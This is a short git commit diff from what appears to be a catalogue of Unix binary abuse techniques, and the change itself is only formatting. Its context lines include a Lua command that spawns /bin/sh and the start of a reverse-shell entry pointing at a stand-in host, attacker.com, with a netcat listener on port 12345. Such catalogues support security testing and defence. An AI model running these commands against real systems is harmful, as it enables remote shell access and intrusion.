Use double backtick for inline code

This commit is contained in:
Emilio Pinna
2018-07-22 15:22:03 +01:00
parent b016b7b9dd
commit 4de0246992
4 changed files with 5 additions and 5 deletions

View File

@@ -3,7 +3,7 @@ functions:
execute-interactive:
- code: lua -e 'os.execute("/bin/sh")'
reverse-shell-non-interactive:
- description: Run <code>nc -l -p 12345</code> on the attacker box to receive the shell. This requires `lua-socket` installed.
- description: Run ``nc -l -p 12345`` on the attacker box to receive the shell. This requires `lua-socket` installed.
code: |
export RHOST=attacker.com
export RPORT=12345